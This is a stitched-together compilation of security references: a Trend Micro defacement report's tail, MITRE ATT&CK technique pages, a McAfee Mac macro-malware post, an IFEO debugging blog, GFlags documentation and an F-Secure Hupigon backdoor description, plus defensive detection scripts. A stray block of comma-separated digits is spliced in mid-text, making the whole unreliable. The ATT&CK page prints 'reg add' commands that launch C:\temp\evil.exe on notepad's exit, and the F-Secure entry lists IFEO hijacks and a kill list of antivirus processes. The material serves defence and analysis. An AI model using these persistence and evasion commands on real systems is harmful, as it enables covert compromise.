28. Edwin Lacierda. (23 April 2012). Official Gazette. "Statement of Presidential Spokesperson Edwin Lacierda". Last accessed on 16 November 2017 at http://www.officialgazette.gov.ph/2012/04/23/statement-of-the-presidential-spokesperson-on-the-denial-of-service-attack-on-pcdspo-maintained-websites-april-23-2012/.
29. Rappler. (25 April 2012). Rappler. "DBM website hacked". Last accessed on 24 November 2017 at https://www.rappler.com/nation/4341-dbm-website-hacked.
30. Reuters. (9 April 2015). CNBC. "China mounts detailed defence of South China Sea reclamation". Last accessed on 223 November 2017 at http://www.cnbc.com/2015/04/09/china-mounts-detailed-defence-of-south-china-sea-reclamation.html.
31. Pastebin. (28 May 2015). #OpChina Official Index. Last accessed on 15 November 2017 at https://pastebin.com/xii97KNy.
32. Anni Piiparinen. (22 July 2016). The Diplomat. "China’s Secret Weapon in the South China Sea: Cyber Attacks". Last accessed on 18 November 2017 at https://thediplomat.com/2016/07/chinas-secret-weapon-in-the-south-china-sea-cyber-attacks/.
33. Vietnam News. (29 July 2016). Vietnam News. "Chinese hackers attack VN’s airports and Vietnam Airlines’ website". Last accessed on 16 November 2017 at http://vietnamnews.vn/society/300416/chinese-hackers-attack-vns-airports-and-vietnam-airlines-website.html#vecZdAWfcqd8iKGz.97.
34. Tara Seals. (29 July 2016). Info-Security Magazine. "Chinese Hackers Attack Airports Across Vietnam". Last accessed on 15 November 2017 at https://www.infosecurity-magazine.com/news/chinese-hackers-attack-airports/.
35. Vietnam News. (29 July 2016). Vietnam News. "Chinese hackers attack VN’s airports and Vietnam Airlines’ website". Last accessed on 16 November 2017 at http://vietnamnews.vn/society/300416/chinese-hackers-attack-vns-airports-and-vietnam-airlines-website.html#vecZdAWfcqd8iKGz.97.
36. GitHub. (n.d.). The Official Exploit Database Repository. Last accessed on 16 November 2017 at https://github.com/offensive-security/exploit-database.
37. Gianlucca Mezzofiore. (2 July 2014). International Business Times. "Team Poison's Junaid Hussain Jailed for Tony Blair Hack and Phone Bombing Anti-Terror Hotline". Last accessed on 20 November 2017 at http://www.ibtimes.co.uk/team-poison-phone-bomb-hacker-anti-terror-367660.
38. Spencer Ackerman, Ewan MacAskill and Alice Ross. (27 August 2015). The Guardian. "Junaid Hussain: British hacker for Isis believed killed in US air strike". Last accessed on 16 November 2017 at https://www.theguardian.com/world/2015/aug/27/junaid-hussain-british-hacker-for-isis-believed-killed-in-us-airstrike.
39. India Defense News. (7 October 2016). India Defense News. "‘Patriotic’ Indian Hackers Lock Pakistani Websites and Refuse to Give Back the Key". Last accessed on 17 November at http://www.indiandefensenews.in/2016/10/patriotic-indian-hackers-lock-pakistani.html.

©2018 by Trend Micro, Incorporated. All rights reserved. Trend Micro and the Trend Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. All other product or company names may be trademarks or registered trademarks of their owners.

TREND MICRO™

Trend Micro Incorporated, a global cloud security leader, creates a world safe for exchanging digital information with its Internet content security and threat management solutions for businesses and consumers. A pioneer in server security with over 20 years of experience, we deliver top-ranked client, server, and cloud-based security that fits our customers’ and partners’ needs; stops new threats faster; and protects data in physical, virtualized, and cloud environments. Powered by the Trend Micro™ Smart Protection Network™ infrastructure, our industry-leading cloud-computing security technology, products and services stop threats where they emerge, on the Internet, and are supported by 1,000+ threat intelligence experts around the globe. For additional information, visit www.trendmicro.com.
Created by: The Global Technical Support and R&D Center of TREND MICRO
www.trendmicro.com

A Deep Dive into Defacement

Contents
Introduction
Our Approach to the Investigation
Targets and Methods of Website Defacers
The Role of Social Media
Real-World Conflicts Reflected in Cyberspace
Conflicts Spark Anti-Israel Defacement Campaigns
Target TLDs of #OpIsrael Defacements
#OpIsrael
#OpIsrael Sub-campaigns
#OpBader / #ElectronicBader / #BaderOperation
#OpSaveGaza
#Save Gaza
Groups behind the Campaigns
Charlie Hebdo Aftermath Results in #OpFrance
Target TLDs of #OpFrance Defacements
Groups Behind the Campaigns
Indian Border Disputes Trigger Campaigns
Target TLD’s of #OpIndia
Cricket leads to #riseofthetigers
Free Kashmir
Nationalism Inspires Retaliatory Hacking
Fallout of the Attacks between India and its Neighbors
Groups behind the Attacks
Military Actions prompt a #SaveSyria Campaign
Target TLDs of #SaveSyria
Campaigns Provoked by Kosovo Disputes
Disputes in the South China Sea
OpPhilippines and OpTaiwan Defacements over Territory
Early Attacks in 2011
OpChinaDown, 2012
StopReclamation and OpChina, 2015
Attacks on Vietnamese Airports, 2016
Hacking Groups’ Connections and Campaigns
Collectives
Campaign Recruitment and Tools
Auxiliary Activities of Defacement Groups
Escalating into Real-World Terrorism Activities
Defaced Sites as Unwitting Infection Sources
Conclusion
Web Defacements and IoT
Hacktivism in the Future
How can enterprises protect their sites?
References
AppleScript - Enterprise | MITRE ATT&CK™

AppleScript

macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program.

AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Adversaries can use this to interact with open SSH connections, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well, such as a reverse shell via python [1]. Scripts can be run from the command line via osascript /path/to/script or osascript -e "script here".

ID: T1155
Tactic: Execution, Lateral Movement
Platform: macOS
Permissions Required: User
Data Sources: API monitoring, System calls, Process monitoring, Process command-line parameters
Supports Remote: Yes
Version: 1.0

Mitigations

Code Signing: Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing. This subjects AppleScript code to the same scrutiny as other .app files passing through Gatekeeper. [2]

Examples

Dok: Dok uses AppleScript to create a login item for persistence. [3]

Detection

Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.

References

1. Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.
2. Steven Sande. (2013, December 23). AppleScript and Automator gain new features in OS X Mavericks. Retrieved September 21, 2018.
3. Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.

Copyright © 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation.
Privacy Policy Terms of Use @MITREattack Contact","0","1","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
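The detection note above asks for monitoring of osascript executions. As an added example (not code from MITRE ATT&CK), the Python triage below runs over constructed process-creation events (JSON lines with pid, parent_image, image and argv; the field names and the document-application list are assumptions) and classifies each osascript launch by how the script was supplied and which parent spawned it:

```python
"""Flag osascript (AppleScript) executions in process-creation events.

Added example for the T1155 detection note; not code from MITRE ATT&CK. The event
format (one JSON object per line with pid, parent_image, image, argv) and the sample
events are constructed; map your EDR's field names onto them before real use."""
import json
import os
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Document apps with no ordinary reason to spawn osascript (constructed list); a macro
# that runs AppleScript, as the macro-malware write-up on this page describes, lands here.
DOCUMENT_APPS = ("Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint")
# The page's Dok example: AppleScript used to create a login item for persistence.
PERSISTENCE_HINTS = ("login item",)

@dataclass
class Alert:
    pid: int
    parent: str          # basename of the parent image
    mode: str            # "inline" (-e text) or "file" (script path or stdin)
    script: str          # the inline text, or the path handed to osascript
    severity: str        # "low" | "medium" | "high"
    reasons: List[str] = field(default_factory=list)

def osascript_script(argv: List[str]) -> Optional[Tuple[str, str]]:
    """Recover what osascript was asked to run, following its documented syntax
    osascript [-l language] [-e command]... [-i] [-s flags] [programfile].
    Returns ("inline", text), ("file", path) or None if argv is not osascript."""
    if not argv or os.path.basename(argv[0]) != "osascript":
        return None
    inline: List[str] = []
    path: Optional[str] = None
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg == "-e" and i + 1 < len(argv):           # each -e is one script line
            inline.append(argv[i + 1])
            i += 2
        elif arg in ("-l", "-s") and i + 1 < len(argv):  # options that take a value
            i += 2
        else:
            if not arg.startswith("-") and path is None:
                path = arg                               # first bare word: script file
            i += 1
    if inline:
        return ("inline", "\n".join(inline))
    return ("file", path or "<stdin>")

def triage(event: dict) -> Optional[Alert]:
    """Turn one process-creation event into an Alert, or None if it is not osascript."""
    parsed = osascript_script(event.get("argv") or [])
    if parsed is None:
        return None
    mode, script = parsed
    parent = os.path.basename(event.get("parent_image", ""))
    reasons = [f"osascript executed with script supplied as {mode}"]
    severity = "low"
    if mode == "inline":      # only the command line records what ran; nothing on disk
        reasons.append("inline script leaves no file to collect")
        severity = "medium"
    if any(parent.startswith(app) for app in DOCUMENT_APPS):
        reasons.append(f"spawned by document application '{parent}'")
        severity = "high"
    if any(hint in script.lower() for hint in PERSISTENCE_HINTS):
        reasons.append("script creates a login item (persistence)")
        severity = "high"
    return Alert(int(event["pid"]), parent, mode, script, severity, reasons)

def triage_log(jsonl: str) -> List[Alert]:
    """Run triage() over a JSON-lines export, keeping only the osascript alerts."""
    alerts: List[Alert] = []
    for line in jsonl.splitlines():
        if line.strip():
            alert = triage(json.loads(line))
            if alert is not None:
                alerts.append(alert)
    return alerts

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 401, "image": "/usr/bin/osascript",
     "parent_image": "/Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel",
     "argv": ["/usr/bin/osascript", "-e", 'display dialog "Please re-enter your password"']},
    {"pid": 402, "image": "/usr/bin/osascript", "parent_image": "/bin/zsh",
     "argv": ["osascript", "/Users/alice/Library/Scripts/rotate-logs.scpt"]},
    {"pid": 403, "image": "/usr/bin/osascript", "parent_image": "/bin/sh",
     "argv": ["osascript", "-e", 'tell application "System Events"', "-e",
              'make login item at end with properties {path:"/Users/alice/Library/Updater.app"}',
              "-e", "end tell"]},
    {"pid": 404, "image": "/usr/bin/python3", "parent_image": "/bin/zsh",
     "argv": ["python3", "report.py"]},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)
```

Running triage_log(SAMPLE_LOG) yields three alerts: the Excel-spawned inline dialog and the login-item script are rated high, the user's own script file low, and the python3 event is ignored.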
Macro Malware Targets Macs
By Yerko Grbic on Feb 14, 2017

Macro malware has been spreading for years. New techniques arise all the time to hide malicious code and thus increase the difficulty of analysis. However, just targeting Microsoft Windows no longer seems to be enough for the malware authors. The Mac appears to be the new challenge, and attackers appear to be rising to this challenge.

In previous versions of macro threats, the malicious code was hidden in user forms and macros in Microsoft Office files. (See Macro Malware Associated With Dridex Finds New Ways to Hide.) The latest member of this family seems to have learned a new trick or two, as we now will see. The malicious code is now hidden in the properties of Excel worksheet files:

[Figure: A malicious Excel file ready to be executed.]
[Figure: When the file is opened we see this message.]

If we access the file's properties, we can read the PowerShell script code.

[Figure: The full content in Properties.]
[Figure: Location of hidden content.]
[Figure: An extract of the PowerShell content.]

The malicious code runs PowerShell, which downloads malware after the victim enables macros. The macro searches for the hidden code in Properties and runs it using PowerShell, but this works only on Windows systems. How does the malicious code execute on the Mac? The malware developers use MacScript:

The macro code verifies whether WScript.Shell is present. In case of an error, the code executes the module macshell:

[Figure: This script runs the code on the Mac.]

The script runs with the same permissions as Microsoft Office. As we ran this analysis, the control server contacted by this malware sample was not running, so we were unable to obtain the payload.

The MD5 hash for the samples we found: 952A36F4231C8628ACEA028B4145DAEC

Full descriptions of the W97M and X97M malware families are available in our Threat Advisories: W97M/Downloader and X97M/Downloader Threat Advisory.

During our analysis, the malware attempted to contact the following server (with URL modified for safety): hxxp://ndur0.net

McAfee advises users to keep their antimalware signatures up to date at all times. McAfee products detect this malicious Office Trojan as X97M/Downloader.bf.
Browser Bookmark Discovery - Enterprise | MITRE ATT&CK™

Browser Bookmark Discovery

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials in Files associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.
ID: T1217
Tactic: Discovery
Platform: Linux, Windows, macOS
Permissions Required: User
Data Sources: API monitoring, File monitoring, Process command-line parameters, Process monitoring
Contributors: Mike Kemmerer
Version: 1.0

Mitigations
This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Examples
Calisto: Calisto collects information on bookmarks from Google Chrome. [2]
Empire: Empire has the ability to gather browser data such as bookmarks and visited sites. [1]
MobileOrder: MobileOrder has a command to upload victim browser bookmarks to its C2 server. [3]

Detection
Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as Windows Management Instrumentation and PowerShell.

System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.

References
[1] Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
[2] Kuzin, M., Zelensky S. (2018, July 20). Calisto Trojan for macOS. Retrieved September 7, 2018.
[3] Falcone, R. and Miller-Osborn, J. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.
Image File Execution Options Injection - Enterprise | MITRE ATT&CK™

Image File Execution Options Injection

Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application's IFEO will be prepended to the application's name, effectively launching the new process under the debugger (e.g., "C:\dbg\ntsd.exe -g notepad.exe"). [1] IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. [2] IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where the final subkey name is the binary on which the debugger is attached. [1]

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non-kernel-mode process). [3] [4] Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. [3] [4] An example where the evil.exe process is started when notepad.exe exits: [4]

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"

Similar to Process Injection, these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. [5] Installing IFEO mechanisms may also provide Persistence via continuous invocation. Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. [6] [7]

ID: T1183
Tactic: Privilege Escalation, Persistence, Defense Evasion
Platform: Windows
Permissions Required: Administrator, SYSTEM
Data Sources: Process monitoring, Windows Registry, Windows event logs
Defense Bypassed: Autoruns Analysis
Contributors: Oddvar Moe, @oddvarmoe
Version: 1.0

Mitigations
This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.
Examples
TEMP.Veles: TEMP.Veles has modified and added entries within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options to maintain persistence. [8]

Detection
Monitor for common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. [1]
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc.
Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. [5]

References
[1] Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017.
[2] Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.
[3] Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.
[4] Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.
[5] Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.
[6] FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.
[7] Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.
[8] Miller, S., et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.
Image File Execution Options (IFEO) – MITHUN SHANBHAG's blog
Mithun Shanbhag, March 24, 2010

[NOTE: This is a repost from my old blog www.debugtricks.com. The old blog no longer exists and I'll be migrating my old posts over to this blog.]

Image File Execution Options provides a mechanism to always launch an executable directly under a debugger. This is extremely useful if you ever need to investigate issues in an executable's startup code (services especially). You can set the IFEO options directly via the registry or indirectly using the Gflags tool (available with the Windows debugging toolkit).

You need to create a registry key and populate it with a value as follows:

Key:   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<exe name>
Value: Debugger : REG_SZ : <full path to debugger>

You do not need the full path to the application; the exe name alone will suffice. However, you do need the full path to the debugger. As an example, to launch notepad under ntsd you would create the following:

Key:   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
Value: Debugger : REG_SZ : "c:\dbg\ntsd.exe -g"

You can also use Gflags to set IFEO.

How does IFEO work?

Kernel32!CreateProcess, when called without the DEBUG_PROCESS or DEBUG_ONLY_THIS_PROCESS creation flags, checks the registry to see if IFEO has been set on the executable that it is launching. If so, it simply prepends the debugger path to the executable name, effectively getting the executable to launch under the debugger. If you do not specify the correct path to the debugger, you'll probably be greeted with a "file not found" error. In our notepad/ntsd example above, Kernel32!CreateProcess ends up invoking:

"c:\dbg\ntsd.exe -g notepad.exe"

Now ntsd eventually launches notepad under the debugger by calling Kernel32!CreateProcess with one of the following creation flags: DEBUG_PROCESS or DEBUG_ONLY_THIS_PROCESS. The presence of either of these creation flags forces Kernel32!CreateProcess to bypass the IFEO options this time around (otherwise we would run into an endless loop) and actually launch the executable under the debugger.

IFEO and 64 bit

A word of caution: for a 32-bit executable running under WOW64 on an x64 machine, your natural tendency might be to create the registry key in the Wow6432Node:

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

However, Gregg Miskelly notes that you should set the IFEO corresponding to the bitness of the application that calls into kernel32!CreateProcess to launch the executable:

"On Win 64, there are two copies of HKEY_LOCAL_MACHINE\Software (one for 32-bit apps, and one for 64-bit apps), and therefore there are two copies of these options. However, where the operating system looks isn't dependent on the bit-ness of the application that is going to be debugged (which is what you would probably expect). Instead, it is dependent on the bit-ness of the application that called CreateProcess."

Other IFEO caveats

Raymond Chen notes the following caveat in his blog entry: "If you passed special parameters via the STARTUPINFO structure, those parameters get passed to the debugger. And the PROCESS_INFO that is returned by the CreateProcess function describes the debugger, not the process being debugged."

IFEO and managed debuggers

IFEO can only be used for native or interop debugging, not for managed debugging. Mike Stall has an excellent blog entry that describes in great detail exactly why. The gist is this: managed debuggers like Mdbg/cordbg/VS.NET use ICorDebug::CreateProcess to launch managed executables under the debugger. However, for managed debugging the debugger should call ICorDebug::CreateProcess without the DEBUG_PROCESS or DEBUG_ONLY_THIS_PROCESS creation flags (this is publicly documented). This API internally ends up calling Kernel32!CreateProcess without the DEBUG_PROCESS or DEBUG_ONLY_THIS_PROCESS creation flags, which leads to the endless loop I described above. Is this an ICorDebug API design flaw? Not really. Just an oversight in my opinion: the API designers missed one scenario. Maybe in the next version of the CLR this will be fixed (I do not know for sure).

Some excellent resources on IFEO:

[MSDN] Launching the debugger automatically (how to launch the VS debugger using IFEO)
[Mike Stall] IFEO and managed debugging
[Raymond Chen] Image File Execution Options just inserts the debugger in front of the command line
[Gregg Miskelly] Inside 'Image File Execution Options' debugging
[Junfeng Zhang] Image File Execution Options (talks about the other not-so-well documented IFEO options)

Exercise for the reader: does IFEO work with other Win32 APIs like ShellExecute, CreateProcessAsUser, CreateProcessWithLogonW and CreateProcessWithTokenW?

TIP of the day

Question: System services can launch before the user has a chance to log on. So how do you debug the startup code of these system services?

Answer: Put the machine under a kernel debugger (KD), use IFEO to launch the service under NTSD (use ntsd's "-d" option to pipe the ntsd output to KD) and reboot the machine. When the system service launches, it will be launched under ntsd. The ntsd debugger will automatically break into KD when it encounters the initial loader breakpoint. The debugging session will begin in user mode automatically (yipee!). After you are done debugging, switch control to KD by issuing the ".breakin" command.
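The same Debugger value is what the malware write-ups on this page (Hupigon.EMV, Trojan.Ushedix) set on security tools, pointing them at a PIF stub or at "ntsd -d" so the tool never starts. As an added example that is not code from the blog or from Microsoft, the following PowerShell audits both the native and the Wow6432Node IFEO keys (the 64-bit caveat above) and flags Debugger values that do not look like a deliberately configured debugger; the allow-list and the list of sensitive image names are assumptions to adapt to your own estate, and the script assumes an elevated session.

```powershell
# Added example (not from the blog or from Microsoft): audit IFEO "Debugger" values on the
# local host. Assumptions: elevated session; the allow-list and watch-list below are
# starting points to adapt.

# Both views matter: the native key is consulted when a 64-bit process calls
# CreateProcess, the Wow6432Node key when a 32-bit process does.
$script:IfeoRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)

# Assumed allow-list: debugger images an engineer would deliberately wire in via IFEO or gflags.
$script:KnownDebuggers = @('ntsd.exe', 'cdb.exe', 'windbg.exe', 'windbgx.exe', 'vsjitdebugger.exe')

# Assumed watch-list: images whose redirection is a classic defence-evasion sign
# (names taken from the malware descriptions on this page, plus taskmgr.exe).
$script:SensitiveImages = @('cmd.exe', 'regedit.exe', 'regedt32.exe', 'msconfig.exe',
                            'autoruns.exe', 'procexp.exe', 'taskmgr.exe', 'avp.exe', '360tray.exe')

function Get-IfeoDebuggerFinding {
    [CmdletBinding()]
    param(
        [string[]]$Root           = $script:IfeoRoots,
        [string[]]$KnownDebugger  = $script:KnownDebuggers,
        [string[]]$SensitiveImage = $script:SensitiveImages
    )

    foreach ($r in $Root) {
        if (-not (Test-Path -LiteralPath $r)) { continue }

        foreach ($key in (Get-ChildItem -LiteralPath $r -ErrorAction SilentlyContinue)) {
            $props = Get-ItemProperty -LiteralPath $key.PSPath -ErrorAction SilentlyContinue
            if ($null -eq $props -or $null -eq $props.PSObject.Properties['Debugger']) { continue }

            $debugger = [string]$props.Debugger
            if ([string]::IsNullOrWhiteSpace($debugger)) { continue }

            # CreateProcess prepends this string verbatim to the command line, so the first
            # token (quoted or not) is the image that really runs; the rest are its arguments.
            $exe  = if ($debugger -match '^"([^"]+)"') { $Matches[1] } else { ($debugger -split '\s+', 2)[0] }
            $leaf = [System.IO.Path]::GetFileName($exe)
            if (-not [System.IO.Path]::HasExtension($leaf)) { $leaf += '.exe' }   # "ntsd" -> "ntsd.exe"

            $reasons = New-Object System.Collections.Generic.List[string]
            if ($KnownDebugger -notcontains $leaf) {
                $reasons.Add('debugger image is not on the allow-list')
            }
            if ($leaf -match '\.(pif|com|bat|cmd|vbs|js|scr)$') {
                $reasons.Add('value is a script or PIF/COM stub rather than a debugger')
            }
            if (-not [System.IO.Path]::IsPathRooted($exe)) {
                # A bare name is resolved through PATH at every launch; when nothing resolves,
                # the target simply fails to start (the "file not found" effect described above).
                $reasons.Add('relative debugger path')
                if (-not (Get-Command -Name $exe -CommandType Application -ErrorAction SilentlyContinue)) {
                    $reasons.Add('debugger not resolvable via PATH')
                }
            } elseif (-not (Test-Path -LiteralPath $exe)) {
                $reasons.Add('debugger file does not exist')
            }
            if ($SensitiveImage -contains $key.PSChildName) {
                $reasons.Add('target is a security or administration tool')
            }

            [pscustomobject]@{
                Hive     = if ($r -like '*Wow6432Node*') { 'Wow6432Node' } else { 'Native' }
                Image    = $key.PSChildName
                Debugger = $debugger
                Verdict  = if ($reasons.Count -eq 0) { 'Expected' } else { 'Suspicious' }
                Reasons  = $reasons -join '; '
            }
        }
    }
}

# Suspicious rows first. After triage, an unwanted entry is removed with
#   Remove-ItemProperty -LiteralPath '<key>' -Name Debugger
# and the redirected tool itself should be checked for tampering (Hupigon-style .exe.exe copies).
Get-IfeoDebuggerFinding | Sort-Object Verdict -Descending | Format-Table -AutoSize -Wrap
```

A legitimately configured entry such as the notepad/ntsd example above (full path, known debugger, file present) comes back as Expected; the "ntsd -d" and "setuprs1.PIF" values from the malware descriptions on this page are reported as Suspicious with the reasons listed.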
GFlags Overview - Windows drivers | Microsoft Docs
06/12/2018, 2 minutes to read

GFlags (gflags.exe), the Global Flags Editor, enables and disables advanced internal system diagnostic and troubleshooting features. You can run GFlags from a Command Prompt window or use its graphical user interface dialog box. For information on how to install and locate gflags.exe, see GFlags.

Use GFlags to activate the following features:

Registry: Set system-wide debugging features for all processes running on the computer. These settings are stored in the GlobalFlag registry entry (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\GlobalFlag). They take effect when you restart Windows and remain effective until you change them and restart again.

Kernel flag settings: Set debugging features for this session. These settings are effective immediately, but are lost when Windows shuts down. The settings affect all processes started after this command completes.

Image file settings: Set debugging features for a particular program. These settings are stored in a GlobalFlag registry entry for each program (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImageFileName\GlobalFlag). They take effect when you restart the program and remain effective until you change them.

Debugger: Specify that a particular program always runs in a debugger. This setting is stored in the registry. It is effective immediately and remains effective until you change it. (This feature is available only in the Global Flags dialog box.)

Launch: Run a program with the specified debugging settings. The debugging settings are effective until the program stops. (This feature is available only from the Global Flags dialog box.)

Special Pool: Request that allocations with a specified pool tag or of a specified size are filled from the special pool. This feature helps you to detect and identify the source of errors in kernel pool use, such as writing beyond the allocated memory space, or referring to memory that has already been freed. Beginning in Windows Vista, you can enable, disable, and configure the special pool feature (Kernel Special Pool Tag) as a kernel flags setting, which does not require a reboot, or as a registry setting, which requires a reboot.

Page heap verification: Enable, disable, and configure page heap verification for a program. When enabled, page heap monitors dynamic heap memory operations, including allocation and free operations, and causes a debugger break when it detects a heap error.

Silent process exit: Enable, disable, and configure monitoring and reporting of silent exits for a process. You can specify actions that occur when a process exits silently, including notification, event logging, and creation of dump files. For more information, see Monitoring Silent Process Exit.
Backdoor:W32/Hupigon.EMV Description | F-Secure Labs

Classification
Category: Malware
Type: Backdoor
Platform: W32
Aliases: Backdoor.Win32.Hupigon.emv

Summary
A backdoor is a Remote Administration Tool (RAT) that exposes infected machines to external control via the Internet by remote attackers.

Removal
Automatic action: Based on the settings of your F-Secure security product, it will either move the file to the quarantine where it cannot spread or cause harm, or remove it.

Technical Details
This backdoor is detected as a member of the Hupigon family; the Backdoor:W32/Hupigon description provides additional details.

Copies itself to:
%Windows%\dllhost.exe
%Windows%\setuprs1.PIF

Replicates these original Windows applications with an additional "EXE" extension:
%Windows%\system32\cmd.exe to %Windows%\system32\cmd.exe.exe
%Windows%\regedit.exe to %Windows%\regedit.exe.exe

Hupigon.EMV attempts to disable/redirect Windows applications using the following registry entries:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe  Debugger = setuprs1.PIF
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe  Debugger = setuprs1.PIF
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe  Debugger = setuprs1.PIF
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe  Debugger = 7303.PIF

Registers itself as the Windows COM+ System Application service using these registry entries:
HKLM\System\CurrentControlSet\Services\COMSystemApp  Type = 00000110
HKLM\System\CurrentControlSet\Services\COMSystemApp  ErrorControl = 00000000
HKLM\System\CurrentControlSet\Services\COMSystemApp  ImagePath = C:\WINDOWS\dllhost.exe -netsvcs
HKLM\System\CurrentControlSet\Services\COMSystemApp  DisplayName = COM+ System Applications

Attempts to locate and terminate the following processes:
360tray.exe
autoruns.exe
avp.exe
avpcc.exe
cpf.exe
ewido.exe
FireTray.exe
FireWall.exe
FYFireWall.exe
jpf.exe
kav.exe
KAVPF.exe
KavPFW.EXE
kpf4gui.exe
KPFW32.EXE
KVCenter.kxp
KvMonXP.kxp
KVXP.kxp
McAfeeFire.exe
mmc.exe
outpost.exe
PFW.exe
procexp.exe
Ras.exe
RfwMain.EXE
RRfwMain.EXE
runiep.exe
ssgui.exe
